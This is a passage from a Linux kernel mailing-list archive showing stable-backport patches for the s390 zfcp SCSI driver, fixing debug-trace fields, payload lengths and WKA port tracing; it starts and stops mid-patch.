index b5afa3d..97f46e6 100644
--- a/drivers/s390/scsi/zfcp_dbf.h
+++ b/drivers/s390/scsi/zfcp_dbf.h
@@ -284,7 +284,7 @@ static inline
 void zfcp_dbf_hba_fsf_resp(char *tag, int level, struct zfcp_fsf_req *req)
 {
 	if (level <= req->adapter->dbf->hba->level)
-		zfcp_dbf_hba_fsf_res(tag, req);
+		zfcp_dbf_hba_fsf_res(tag, level, req);
 }
 
 /**
@@ -323,7 +323,7 @@ void _zfcp_dbf_scsi(char *tag, int level, struct scsi_cmnd *scmd,
 					scmd->device->host->hostdata[0];
 
 	if (level <= adapter->dbf->scsi->level)
-		zfcp_dbf_scsi(tag, scmd, req);
+		zfcp_dbf_scsi(tag, level, scmd, req);
 }
 
 /**
diff --git a/drivers/s390/scsi/zfcp_ext.h b/drivers/s390/scsi/zfcp_ext.h
index 1d3dd3f..1282165 100644
--- a/drivers/s390/scsi/zfcp_ext.h
+++ b/drivers/s390/scsi/zfcp_ext.h
@@ -3,7 +3,7 @@
  *
  * External function declarations.
  *
- * Copyright IBM Corp. 2002, 2010
+ * Copyright IBM Corp. 2002, 2015
  */
 
 #ifndef ZFCP_EXT_H
@@ -50,7 +50,7 @@ extern void zfcp_dbf_rec_trig(char *, struct zfcp_adapter *,
 			      struct zfcp_port *, struct scsi_device *, u8, u8);
 extern void zfcp_dbf_rec_run(char *, struct zfcp_erp_action *);
 extern void zfcp_dbf_hba_fsf_uss(char *, struct zfcp_fsf_req *);
-extern void zfcp_dbf_hba_fsf_res(char *, struct zfcp_fsf_req *);
+extern void zfcp_dbf_hba_fsf_res(char *, int, struct zfcp_fsf_req *);
 extern void zfcp_dbf_hba_bit_err(char *, struct zfcp_fsf_req *);
 extern void zfcp_dbf_hba_berr(struct zfcp_dbf *, struct zfcp_fsf_req *);
 extern void zfcp_dbf_hba_def_err(struct zfcp_adapter *, u64, u16, void **);
@@ -58,7 +58,8 @@ extern void zfcp_dbf_hba_basic(char *, struct zfcp_adapter *);
 extern void zfcp_dbf_san_req(char *, struct zfcp_fsf_req *, u32);
 extern void zfcp_dbf_san_res(char *, struct zfcp_fsf_req *);
 extern void zfcp_dbf_san_in_els(char *, struct zfcp_fsf_req *);
-extern void zfcp_dbf_scsi(char *, struct scsi_cmnd *, struct zfcp_fsf_req *);
+extern void zfcp_dbf_scsi(char *, int, struct scsi_cmnd *,
+			  struct zfcp_fsf_req *);
 
 /* zfcp_erp.c */
 extern void zfcp_erp_set_adapter_status(struct zfcp_adapter *, u32);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 134/319] zfcp: restore: Dont use 0 to indicate invalid LUN in rec trace
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (32 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 133/319] zfcp: retain trace level for SCSI and HBA FSF response records Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 135/319] zfcp: trace on request for open and close of WKA port Willy Tarreau
                   ` (184 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit 0102a30a6ff60f4bb4c07358ca3b1f92254a6c25 upstream.

bring back
commit d21e9daa63e009ce5b87bbcaa6d11ce48e07bbbe
("[SCSI] zfcp: Dont use 0 to indicate invalid LUN in rec trace")
which was lost with
commit ae0904f60fab7cb20c48d32eefdd735e478b91fb
("[SCSI] zfcp: Redesign of the debug tracing for recovery actions.")

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: ae0904f60fab ("[SCSI] zfcp: Redesign of the debug tracing for recovery actions.")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index 8f668c6..394d5d4 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -234,7 +234,8 @@ static void zfcp_dbf_set_common(struct zfcp_dbf_rec *rec,
 	if (sdev) {
 		rec->lun_status = atomic_read(&sdev_to_zfcp(sdev)->status);
 		rec->lun = zfcp_scsi_dev_lun(sdev);
-	}
+	} else
+		rec->lun = ZFCP_DBF_INVALID_LUN;
 }
 
 /**
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 135/319] zfcp: trace on request for open and close of WKA port
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (33 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 134/319] zfcp: restore: Dont use 0 to indicate invalid LUN in rec trace Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 136/319] zfcp: restore tracing of handle for port and LUN with HBA records Willy Tarreau
                   ` (183 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit d27a7cb91960cf1fdd11b10071e601828cbf4b1f upstream.

Since commit a54ca0f62f953898b05549391ac2a8a4dad6482b
("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
HBA records no longer contain WWPN, D_ID, or LUN
to reduce duplicate information which is already in REC records.
In contrast to "regular" target ports, we don't use recovery to open
WKA ports such as directory/nameserver, so we don't get REC records.
Therefore, introduce pseudo REC running records without any
actual recovery action but including D_ID of WKA port on open/close.

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: a54ca0f62f95 ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 32 ++++++++++++++++++++++++++++++++
 drivers/s390/scsi/zfcp_ext.h |  1 +
 drivers/s390/scsi/zfcp_fsf.c |  8 ++++++--
 3 files changed, 39 insertions(+), 2 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index 394d5d4..e99b3d6 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -314,6 +314,38 @@ void zfcp_dbf_rec_run(char *tag, struct zfcp_erp_action *erp)
 	spin_unlock_irqrestore(&dbf->rec_lock, flags);
 }
 
+/**
+ * zfcp_dbf_rec_run_wka - trace wka port event with info like running recovery
+ * @tag: identifier for event
+ * @wka_port: well known address port
+ * @req_id: request ID to correlate with potential HBA trace record
+ */
+void zfcp_dbf_rec_run_wka(char *tag, struct zfcp_fc_wka_port *wka_port,
+			  u64 req_id)
+{
+	struct zfcp_dbf *dbf = wka_port->adapter->dbf;
+	struct zfcp_dbf_rec *rec = &dbf->rec_buf;
+	unsigned long flags;
+
+	spin_lock_irqsave(&dbf->rec_lock, flags);
+	memset(rec, 0, sizeof(*rec));
+
+	rec->id = ZFCP_DBF_REC_RUN;
+	memcpy(rec->tag, tag, ZFCP_DBF_TAG_LEN);
+	rec->port_status = wka_port->status;
+	rec->d_id = wka_port->d_id;
+	rec->lun = ZFCP_DBF_INVALID_LUN;
+
+	rec->u.run.fsf_req_id = req_id;
+	rec->u.run.rec_status = ~0;
+	rec->u.run.rec_step = ~0;
+	rec->u.run.rec_action = ~0;
+	rec->u.run.rec_count = ~0;
+
+	debug_event(dbf->rec, 1, rec, sizeof(*rec));
+	spin_unlock_irqrestore(&dbf->rec_lock, flags);
+}
+
 static inline
 void zfcp_dbf_san(char *tag, struct zfcp_dbf *dbf, void *data, u8 id, u16 len,
 		  u64 req_id, u32 d_id)
diff --git a/drivers/s390/scsi/zfcp_ext.h b/drivers/s390/scsi/zfcp_ext.h
index 1282165..01527c3 100644
--- a/drivers/s390/scsi/zfcp_ext.h
+++ b/drivers/s390/scsi/zfcp_ext.h
@@ -49,6 +49,7 @@ extern void zfcp_dbf_adapter_unregister(struct zfcp_adapter *);
 extern void zfcp_dbf_rec_trig(char *, struct zfcp_adapter *,
 			      struct zfcp_port *, struct scsi_device *, u8, u8);
 extern void zfcp_dbf_rec_run(char *, struct zfcp_erp_action *);
+extern void zfcp_dbf_rec_run_wka(char *, struct zfcp_fc_wka_port *, u64);
 extern void zfcp_dbf_hba_fsf_uss(char *, struct zfcp_fsf_req *);
 extern void zfcp_dbf_hba_fsf_res(char *, int, struct zfcp_fsf_req *);
 extern void zfcp_dbf_hba_bit_err(char *, struct zfcp_fsf_req *);
diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c
index 8e0979c..8898139 100644
--- a/drivers/s390/scsi/zfcp_fsf.c
+++ b/drivers/s390/scsi/zfcp_fsf.c
@@ -1605,7 +1605,7 @@ out:
 int zfcp_fsf_open_wka_port(struct zfcp_fc_wka_port *wka_port)
 {
 	struct zfcp_qdio *qdio = wka_port->adapter->qdio;
-	struct zfcp_fsf_req *req;
+	struct zfcp_fsf_req *req = NULL;
 	int retval = -EIO;
 
 	spin_lock_irq(&qdio->req_q_lock);
@@ -1634,6 +1634,8 @@ int zfcp_fsf_open_wka_port(struct zfcp_fc_wka_port *wka_port)
 		zfcp_fsf_req_free(req);
 out:
 	spin_unlock_irq(&qdio->req_q_lock);
+	if (req && !IS_ERR(req))
+		zfcp_dbf_rec_run_wka("fsowp_1", wka_port, req->req_id);
 	return retval;
 }
 
@@ -1658,7 +1660,7 @@ static void zfcp_fsf_close_wka_port_handler(struct zfcp_fsf_req *req)
 int zfcp_fsf_close_wka_port(struct zfcp_fc_wka_port *wka_port)
 {
 	struct zfcp_qdio *qdio = wka_port->adapter->qdio;
-	struct zfcp_fsf_req *req;
+	struct zfcp_fsf_req *req = NULL;
 	int retval = -EIO;
 
 	spin_lock_irq(&qdio->req_q_lock);
@@ -1687,6 +1689,8 @@ int zfcp_fsf_close_wka_port(struct zfcp_fc_wka_port *wka_port)
 		zfcp_fsf_req_free(req);
 out:
 	spin_unlock_irq(&qdio->req_q_lock);
+	if (req && !IS_ERR(req))
+		zfcp_dbf_rec_run_wka("fscwp_1", wka_port, req->req_id);
 	return retval;
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 136/319] zfcp: restore tracing of handle for port and LUN with HBA records
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (34 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 135/319] zfcp: trace on request for open and close of WKA port Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 137/319] zfcp: fix D_ID field with actual value on tracing SAN responses Willy Tarreau
                   ` (182 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit 7c964ffe586bc0c3d9febe9bf97a2e4b2866e5b7 upstream.

This information was lost with
commit a54ca0f62f953898b05549391ac2a8a4dad6482b
("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
but is required to debug e.g. invalid handle situations.

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: a54ca0f62f95 ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 2 ++
 drivers/s390/scsi/zfcp_dbf.h | 2 ++
 2 files changed, 4 insertions(+)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index e99b3d6..1abe57d 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -78,6 +78,8 @@ void zfcp_dbf_hba_fsf_res(char *tag, int level, struct zfcp_fsf_req *req)
 	rec->u.res.req_issued = req->issued;
 	rec->u.res.prot_status = q_pref->prot_status;
 	rec->u.res.fsf_status = q_head->fsf_status;
+	rec->u.res.port_handle = q_head->port_handle;
+	rec->u.res.lun_handle = q_head->lun_handle;
 
 	memcpy(rec->u.res.prot_status_qual, &q_pref->prot_status_qual,
 	       FSF_PROT_STATUS_QUAL_SIZE);
diff --git a/drivers/s390/scsi/zfcp_dbf.h b/drivers/s390/scsi/zfcp_dbf.h
index 97f46e6..ac7bce8 100644
--- a/drivers/s390/scsi/zfcp_dbf.h
+++ b/drivers/s390/scsi/zfcp_dbf.h
@@ -131,6 +131,8 @@ struct zfcp_dbf_hba_res {
 	u8  prot_status_qual[FSF_PROT_STATUS_QUAL_SIZE];
 	u32 fsf_status;
 	u8  fsf_status_qual[FSF_STATUS_QUALIFIER_SIZE];
+	u32 port_handle;
+	u32 lun_handle;
 } __packed;
 
 /**
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 137/319] zfcp: fix D_ID field with actual value on tracing SAN responses
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (35 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 136/319] zfcp: restore tracing of handle for port and LUN with HBA records Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 138/319] zfcp: fix payload trace length for SAN request&response Willy Tarreau
                   ` (181 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit 771bf03537ddfa4a4dde62ef9dfbc82e4f77ab20 upstream.

With commit 2c55b750a884b86dea8b4cc5f15e1484cc47a25c
("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
we lost the N_Port-ID where an ELS response comes from.
With commit 7c7dc196814b9e1d5cc254dc579a5fa78ae524f7
("[SCSI] zfcp: Simplify handling of ct and els requests")
we lost the N_Port-ID where a CT response comes from.
It's especially useful if the request SAN trace record
with D_ID was already lost due to trace buffer wrap.

GS uses an open WKA port handle and ELS just a D_ID, and
only for ELS we could get D_ID from QTCB bottom via zfcp_fsf_req.
To cover both cases, add a new field to zfcp_fsf_ct_els
and fill it in on request to use in SAN response trace.
Strictly speaking the D_ID on SAN response is the FC frame's S_ID.
We don't need a field for the other end which is always us.

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 2c55b750a884 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
Fixes: 7c7dc196814b ("[SCSI] zfcp: Simplify handling of ct and els requests")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 2 +-
 drivers/s390/scsi/zfcp_fsf.c | 2 ++
 drivers/s390/scsi/zfcp_fsf.h | 4 +++-
 3 files changed, 6 insertions(+), 2 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index 1abe57d..a940602 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -400,7 +400,7 @@ void zfcp_dbf_san_res(char *tag, struct zfcp_fsf_req *fsf)
 
 	length = (u16)(ct_els->resp->length + FC_CT_HDR_LEN);
 	zfcp_dbf_san(tag, dbf, sg_virt(ct_els->resp), ZFCP_DBF_SAN_RES, length,
-		     fsf->req_id, 0);
+		     fsf->req_id, ct_els->d_id);
 }
 
 /**
diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c
index 8898139..f246097 100644
--- a/drivers/s390/scsi/zfcp_fsf.c
+++ b/drivers/s390/scsi/zfcp_fsf.c
@@ -1085,6 +1085,7 @@ int zfcp_fsf_send_ct(struct zfcp_fc_wka_port *wka_port,
 
 	req->handler = zfcp_fsf_send_ct_handler;
 	req->qtcb->header.port_handle = wka_port->handle;
+	ct->d_id = wka_port->d_id;
 	req->data = ct;
 
 	zfcp_dbf_san_req("fssct_1", req, wka_port->d_id);
@@ -1188,6 +1189,7 @@ int zfcp_fsf_send_els(struct zfcp_adapter *adapter, u32 d_id,
 
 	hton24(req->qtcb->bottom.support.d_id, d_id);
 	req->handler = zfcp_fsf_send_els_handler;
+	els->d_id = d_id;
 	req->data = els;
 
 	zfcp_dbf_san_req("fssels1", req, d_id);
diff --git a/drivers/s390/scsi/zfcp_fsf.h b/drivers/s390/scsi/zfcp_fsf.h
index 5e795b8..8cad41f 100644
--- a/drivers/s390/scsi/zfcp_fsf.h
+++ b/drivers/s390/scsi/zfcp_fsf.h
@@ -3,7 +3,7 @@
  *
  * Interface to the FSF support functions.
  *
- * Copyright IBM Corp. 2002, 2010
+ * Copyright IBM Corp. 2002, 2015
  */
 
 #ifndef FSF_H
@@ -462,6 +462,7 @@ struct zfcp_blk_drv_data {
  * @handler_data: data passed to handler function
  * @port: Optional pointer to port for zfcp internal ELS (only test link ADISC)
  * @status: used to pass error status to calling function
+ * @d_id: Destination ID of either open WKA port for CT or of D_ID for ELS
  */
 struct zfcp_fsf_ct_els {
 	struct scatterlist *req;
@@ -470,6 +471,7 @@ struct zfcp_fsf_ct_els {
 	void *handler_data;
 	struct zfcp_port *port;
 	int status;
+	u32 d_id;
 };
 
 #endif				/* FSF_H */
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 138/319] zfcp: fix payload trace length for SAN request&response
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (36 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 137/319] zfcp: fix D_ID field with actual value on tracing SAN responses Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 139/319] zfcp: trace full payload of all SAN records (req,resp,iels) Willy Tarreau
                   ` (180 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit 94db3725f049ead24c96226df4a4fb375b880a77 upstream.

commit 2c55b750a884b86dea8b4cc5f15e1484cc47a25c
("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
started to add FC_CT_HDR_LEN which made zfcp dump random data
out of bounds for RSPN GS responses because u.rspn.rsp
is the largest and last field in the union of struct zfcp_fc_req.
Other request/response types only happened to stay within bounds
due to the padding of the union or
due to the trace capping of u.gspn.rsp to ZFCP_DBF_SAN_MAX_PAYLOAD.

Timestamp      : ...
Area           : SAN
Subarea        : 00
Level          : 1
Exception      : -
CPU id         : ..
Caller         : ...
Record id      : 2
Tag            : fsscth2
Request id     : 0x...
Destination ID : 0x00fffffc
Payload short  : 01000000 fc020000 80020000 00000000
                 xxxxxxxx xxxxxxxx xxxxxxxx xxxxxxxx <===
                 00000000 00000000 00000000 00000000
Payload length : 32                                  <===

struct zfcp_fc_req {
    [0] struct zfcp_fsf_ct_els ct_els;
   [56] struct scatterlist sg_req;
   [96] struct scatterlist sg_rsp;
        union {
            struct {req; rsp;} adisc;    SIZE: 28+28=   56
            struct {req; rsp;} gid_pn;   SIZE: 24+20=   44
            struct {rspsg; req;} gpn_ft; SIZE: 40*4+20=180
            struct {req; rsp;} gspn;     SIZE: 20+273= 293
            struct {req; rsp;} rspn;     SIZE: 277+16= 293
  [136] } u;
}
SIZE: 432

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 2c55b750a884 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
Reviewed-by: Alexey Ishchuk <aishchuk@linux.vnet.ibm.com>
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index a940602..90ffe7b 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -382,7 +382,7 @@ void zfcp_dbf_san_req(char *tag, struct zfcp_fsf_req *fsf, u32 d_id)
 	struct zfcp_fsf_ct_els *ct_els = fsf->data;
 	u16 length;
 
-	length = (u16)(ct_els->req->length + FC_CT_HDR_LEN);
+	length = (u16)(ct_els->req->length);
 	zfcp_dbf_san(tag, dbf, sg_virt(ct_els->req), ZFCP_DBF_SAN_REQ, length,
 		     fsf->req_id, d_id);
 }
@@ -398,7 +398,7 @@ void zfcp_dbf_san_res(char *tag, struct zfcp_fsf_req *fsf)
 	struct zfcp_fsf_ct_els *ct_els = fsf->data;
 	u16 length;
 
-	length = (u16)(ct_els->resp->length + FC_CT_HDR_LEN);
+	length = (u16)(ct_els->resp->length);
 	zfcp_dbf_san(tag, dbf, sg_virt(ct_els->resp), ZFCP_DBF_SAN_RES, length,
 		     fsf->req_id, ct_els->d_id);
 }
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 139/319] zfcp: trace full payload of all SAN records (req,resp,iels)
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (37 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 138/319] zfcp: fix payload trace length for SAN request&response Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 140/319] scsi: zfcp: spin_lock_irqsave() is not nestable Willy Tarreau
                   ` (179 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit aceeffbb59bb91404a0bda32a542d7ebf878433a upstream.

This was lost with commit 2c55b750a884b86dea8b4cc5f15e1484cc47a25c
("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
but is necessary for problem determination, e.g. to see the
currently active zone set during automatic port scan.

For the large GPN_FT response (4 pages), save space by not dumping
any empty residual entries.

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 2c55b750a884 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
Reviewed-by: Alexey Ishchuk <aishchuk@linux.vnet.ibm.com>
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 116 ++++++++++++++++++++++++++++++++++++++-----
 drivers/s390/scsi/zfcp_dbf.h |   1 +
 2 files changed, 104 insertions(+), 13 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index 90ffe7b..d45071c 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -3,7 +3,7 @@
  *
  * Debug traces for zfcp.
  *
- * Copyright IBM Corp. 2002, 2015
+ * Copyright IBM Corp. 2002, 2016
  */
 
 #define KMSG_COMPONENT "zfcp"
@@ -349,12 +349,15 @@ void zfcp_dbf_rec_run_wka(char *tag, struct zfcp_fc_wka_port *wka_port,
 }
 
 static inline
-void zfcp_dbf_san(char *tag, struct zfcp_dbf *dbf, void *data, u8 id, u16 len,
-		  u64 req_id, u32 d_id)
+void zfcp_dbf_san(char *tag, struct zfcp_dbf *dbf,
+		  char *paytag, struct scatterlist *sg, u8 id, u16 len,
+		  u64 req_id, u32 d_id, u16 cap_len)
 {
 	struct zfcp_dbf_san *rec = &dbf->san_buf;
 	u16 rec_len;
 	unsigned long flags;
+	struct zfcp_dbf_pay *payload = &dbf->pay_buf;
+	u16 pay_sum = 0;
 
 	spin_lock_irqsave(&dbf->san_lock, flags);
 	memset(rec, 0, sizeof(*rec));
@@ -362,10 +365,41 @@ void zfcp_dbf_san(char *tag, struct zfcp_dbf *dbf, void *data, u8 id, u16 len,
 	rec->id = id;
 	rec->fsf_req_id = req_id;
 	rec->d_id = d_id;
-	rec_len = min(len, (u16)ZFCP_DBF_SAN_MAX_PAYLOAD);
-	memcpy(rec->payload, data, rec_len);
 	memcpy(rec->tag, tag, ZFCP_DBF_TAG_LEN);
+	rec->pl_len = len; /* full length even if we cap pay below */
+	if (!sg)
+		goto out;
+	rec_len = min_t(unsigned int, sg->length, ZFCP_DBF_SAN_MAX_PAYLOAD);
+	memcpy(rec->payload, sg_virt(sg), rec_len); /* part of 1st sg entry */
+	if (len <= rec_len)
+		goto out; /* skip pay record if full content in rec->payload */
+
+	/* if (len > rec_len):
+	 * dump data up to cap_len ignoring small duplicate in rec->payload
+	 */
+	spin_lock_irqsave(&dbf->pay_lock, flags);
+	memset(payload, 0, sizeof(*payload));
+	memcpy(payload->area, paytag, ZFCP_DBF_TAG_LEN);
+	payload->fsf_req_id = req_id;
+	payload->counter = 0;
+	for (; sg && pay_sum < cap_len; sg = sg_next(sg)) {
+		u16 pay_len, offset = 0;
+
+		while (offset < sg->length && pay_sum < cap_len) {
+			pay_len = min((u16)ZFCP_DBF_PAY_MAX_REC,
+				      (u16)(sg->length - offset));
+			/* cap_len <= pay_sum < cap_len+ZFCP_DBF_PAY_MAX_REC */
+			memcpy(payload->data, sg_virt(sg) + offset, pay_len);
+			debug_event(dbf->pay, 1, payload,
+				    zfcp_dbf_plen(pay_len));
+			payload->counter++;
+			offset += pay_len;
+			pay_sum += pay_len;
+		}
+	}
+	spin_unlock(&dbf->pay_lock);
 
+out:
 	debug_event(dbf->san, 1, rec, sizeof(*rec));
 	spin_unlock_irqrestore(&dbf->san_lock, flags);
 }
@@ -382,9 +416,62 @@ void zfcp_dbf_san_req(char *tag, struct zfcp_fsf_req *fsf, u32 d_id)
 	struct zfcp_fsf_ct_els *ct_els = fsf->data;
 	u16 length;
 
-	length = (u16)(ct_els->req->length);
-	zfcp_dbf_san(tag, dbf, sg_virt(ct_els->req), ZFCP_DBF_SAN_REQ, length,
-		     fsf->req_id, d_id);
+	length = (u16)zfcp_qdio_real_bytes(ct_els->req);
+	zfcp_dbf_san(tag, dbf, "san_req", ct_els->req, ZFCP_DBF_SAN_REQ,
+		     length, fsf->req_id, d_id, length);
+}
+
+static u16 zfcp_dbf_san_res_cap_len_if_gpn_ft(char *tag,
+					      struct zfcp_fsf_req *fsf,
+					      u16 len)
+{
+	struct zfcp_fsf_ct_els *ct_els = fsf->data;
+	struct fc_ct_hdr *reqh = sg_virt(ct_els->req);
+	struct fc_ns_gid_ft *reqn = (struct fc_ns_gid_ft *)(reqh + 1);
+	struct scatterlist *resp_entry = ct_els->resp;
+	struct fc_gpn_ft_resp *acc;
+	int max_entries, x, last = 0;
+
+	if (!(memcmp(tag, "fsscth2", 7) == 0
+	      && ct_els->d_id == FC_FID_DIR_SERV
+	      && reqh->ct_rev == FC_CT_REV
+	      && reqh->ct_in_id[0] == 0
+	      && reqh->ct_in_id[1] == 0
+	      && reqh->ct_in_id[2] == 0
+	      && reqh->ct_fs_type == FC_FST_DIR
+	      && reqh->ct_fs_subtype == FC_NS_SUBTYPE
+	      && reqh->ct_options == 0
+	      && reqh->_ct_resvd1 == 0
+	      && reqh->ct_cmd == FC_NS_GPN_FT
+	      /* reqh->ct_mr_size can vary so do not match but read below */
+	      && reqh->_ct_resvd2 == 0
+	      && reqh->ct_reason == 0
+	      && reqh->ct_explan == 0
+	      && reqh->ct_vendor == 0
+	      && reqn->fn_resvd == 0
+	      && reqn->fn_domain_id_scope == 0
